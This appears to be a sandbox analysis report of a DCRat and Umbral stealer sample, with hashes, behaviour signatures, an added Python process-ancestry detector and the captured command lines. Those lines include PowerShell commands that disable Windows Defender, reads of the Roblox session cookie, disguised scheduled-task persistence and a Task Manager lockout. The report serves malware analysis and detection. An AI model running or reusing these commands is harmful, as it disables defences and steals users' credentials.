memory/2692-39-0x0000000000160000-0x0000000000170000-memory.dmp

memory/2692-40-0x0000000000AD0000-0x0000000000B26000-memory.dmp

memory/2692-41-0x0000000000170000-0x000000000017C000-memory.dmp

memory/2692-42-0x0000000000180000-0x000000000018C000-memory.dmp

memory/2692-43-0x0000000000390000-0x000000000039C000-memory.dmp

memory/2692-44-0x00000000003A0000-0x00000000003A8000-memory.dmp

memory/2692-45-0x0000000000530000-0x000000000053A000-memory.dmp

memory/2692-46-0x00000000005C0000-0x00000000005CE000-memory.dmp

memory/2692-47-0x00000000006E0000-0x00000000006E8000-memory.dmp

memory/2692-48-0x00000000006F0000-0x00000000006FA000-memory.dmp

memory/2692-49-0x0000000000700000-0x000000000070C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eSeckPEt0m.bat

MD5 c4e42cae876a05ae0c753a0a8fd32164
SHA1 d8cc369a8649c85f0c25f0826d447f3c62191238
SHA256 75daf4baae8d884fab1397f8524a6f645895de1a81e03ba5c776d7ec726abb45
SHA512 e569796ef385532522c271e9d7832ff9bc0920ad4b73441024ab10ace401cf41fe182ea16fc2992044c444cb325beaf156a871d0dedd14672dd9c3b95d5ce1f1

memory/1976-93-0x0000000001300000-0x000000000154A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f3ee51fa-6ca5-405c-bf99-9cf2f55fcb50.vbs

MD5 599938f2aed6b131cd8d747f26edb4d4
SHA1 62906394e606959918b273c8a6f711a85b0505ee
SHA256 ab1325106363bf6a296704640c8c8d4194f240ca53080e7fa3ddae1c3338d562
SHA512 f1d0434c1385cef8546a4dbdf38b64ec29a278c649732c0e7f178e1f8637f1864b216dda373188c10edd522e03241649ce3ccaf8ce39ae66043143ec06f1f8b1

C:\Users\Admin\AppData\Local\Temp\9a182fe7-568d-414b-951d-25d6244808b7.vbs

MD5 cf054cb4dd3a2611b771fe67b621dc7d
SHA1 6f3768c0436933ba418a03b2ade39cd4ffb2f1dd
SHA256 add2fe82610d0f7bdcfe3d6ff4dfe245f991e2f0b21a475c1377f062017a0de8
SHA512 8ea088f7368d414b792f3a459779a73ee51f1dd0de80552acf5b58702ca2ac1a19904f9497ba137f5293ec389c4e19dde5bc51ea75f4179f1260f733323c7ea1

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-03 19:11

Reported

2024-05-03 19:13

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe (×21: the original table lists this row 21 times)
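
The table above records only that wmiprvse.exe spawned schtasks.exe. The same detonation also shows a Temp-resident dropper launching wmic.exe, attrib.exe and powershell.exe, and a WScript.exe instance launching cmd.exe (the WriteProcessMemory rows for this analysis). The Python below is an added example, not part of this report or of any vendor tooling, that applies both checks to process-creation events and reconstructs the full ancestry of each hit. The pid/ppid list is constructed from this report's rows, with made-up pids for the explorer.exe root and for the wmiprvse.exe pair, which the report does not number; the UNEXPECTED_PAIRS and LOLBINS sets are the author's choice of rules.

```python
import ntpath

# Constructed process-creation events (pid, ppid, image path). The dropper chain is taken
# from this report's WriteProcessMemory rows; pids 1000, 700, 900 and 901 are made up.
EVENTS = [
    (1000, 1,    r"C:\Windows\explorer.exe"),
    (3196, 1000, r"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"),
    (1956, 3196, r"C:\Users\Admin\AppData\Local\Temp\stealer.exe"),
    (4664, 3196, r"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"),
    (4132, 3196, r"C:\Users\Admin\AppData\Local\Temp\Inject.exe"),
    (3320, 4664, r"C:\Windows\SysWOW64\WScript.exe"),
    (548,  3320, r"C:\Windows\SysWOW64\cmd.exe"),
    (4712, 1956, r"C:\Windows\System32\Wbem\wmic.exe"),
    (4408, 1956, r"C:\Windows\SYSTEM32\attrib.exe"),
    (2700, 1956, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    (900,  700,  r"C:\Windows\system32\wbem\wmiprvse.exe"),
    (901,  900,  r"C:\Windows\system32\schtasks.exe"),
]

# Assumed rule set: parent/child pairs that normal Windows activity does not produce.
# The WMI provider host has no business launching a scheduler client or a shell, and a
# script host launching cmd.exe is the .vbe/.bat dropper stage seen in this report.
UNEXPECTED_PAIRS = {
    ("wmiprvse.exe", "schtasks.exe"),
    ("wmiprvse.exe", "cmd.exe"),
    ("wmiprvse.exe", "powershell.exe"),
    ("wscript.exe", "cmd.exe"),
    ("wscript.exe", "powershell.exe"),
}

# Built-in tools that a freshly dropped binary should not be driving.
LOLBINS = {"wmic.exe", "powershell.exe", "schtasks.exe", "attrib.exe", "reg.exe",
           "wscript.exe", "cmd.exe"}


def in_user_writable_dir(image):
    """True for images under the user's Temp directory or C:\\Users\\Public."""
    p = image.lower()
    return "\\appdata\\local\\temp\\" in p or p.startswith("c:\\users\\public\\")


def ancestry(pid, parent_of, image_of):
    """Image basenames from the oldest captured ancestor down to pid."""
    chain, seen = [], set()
    while pid in image_of and pid not in seen:
        seen.add(pid)
        chain.append(ntpath.basename(image_of[pid]))
        pid = parent_of[pid]
    return list(reversed(chain))


def detect(events):
    """Return one finding per event that matches a rule, with its process chain."""
    image_of = {pid: image for pid, _, image in events}
    parent_of = {pid: ppid for pid, ppid, _ in events}
    findings = []
    for pid, ppid, image in events:
        parent = image_of.get(ppid)
        if parent is None:
            continue  # parent not in the capture: nothing to judge
        pb = ntpath.basename(parent).lower()
        cb = ntpath.basename(image).lower()
        rule = None
        if (pb, cb) in UNEXPECTED_PAIRS:
            rule = "unexpected_parent"
        elif cb in LOLBINS and in_user_writable_dir(parent):
            rule = "dropped_binary_spawns_lolbin"
        if rule:
            findings.append({"rule": rule, "pid": pid,
                             "chain": " -> ".join(ancestry(pid, parent_of, image_of))})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f'{f["rule"]:30} pid={f["pid"]:<5} {f["chain"]}')
```

Run over Sysmon event 1 (ProcessCreate) or Security 4688 with ParentProcessId populated; the chain string is what to put in the alert, since a bare "wmiprvse.exe spawned schtasks.exe" line gives the responder nothing to pivot on.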

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
(The target is the hosts table that happens to live under the drivers directory, not a driver; writing to it lets the stealer redirect or null-route name resolution for domains of its choosing, so the file is worth diffing during triage.)

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\22eafd247d37c3 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\f3b6ecef712a24 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\6203df4a6bafc7 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\bcastdvr\WmiPrvSE.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\bcastdvr\24dbde2999530e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\RemotePackages\RemoteApps\9e8d7a4ca61bd9 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×10)
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A (×13)
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A (×40)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
(The 21 wmic.exe rows above, SeIncreaseQuotaPrivilege through token 36, are listed a second time for another wmic.exe instance.)
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (×4)
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3196 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3196 wrote to memory of 1956 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3196 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3196 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 4664 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 1956 wrote to memory of 4712 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 1956 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1956 wrote to memory of 3836 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1956 wrote to memory of 4000 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3320 wrote to memory of 548 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 548 wrote to memory of 1548 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 1956 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 1548 wrote to memory of 4556 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 548 wrote to memory of 4344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4556 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 1956 wrote to memory of 916 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 916 wrote to memory of 2632 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 4556 wrote to memory of 2020 N/A C:\Windows\System32\cmd.exe C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe
PID 2020 wrote to memory of 2996 N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\Windows\System32\WScript.exe
PID 2020 wrote to memory of 4048 N/A C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\sppsvc.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmon" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "sysmons" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\sysmon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\bcastdvr\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe

"C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs"

Network


Files

C:\Users\Admin\AppData\Local\Temp\stealer.exe

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

C:\Users\Admin\AppData\Local\Temp\Inject.exe

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zgzpw44y.q30.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

C:\MsWinsessiondllNet\driverBrokercommon.exe

C:\Users\Admin\AppData\Local\Temp\dFjI7tVufc.bat

C:\Users\Admin\AppData\Local\Temp\4f7f3a5f-13d0-4896-b122-f11ad12acd3b.vbs

C:\Users\Admin\AppData\Local\Temp\bd577cd0-adcf-48e3-95fc-6ecef81cdaf1.vbs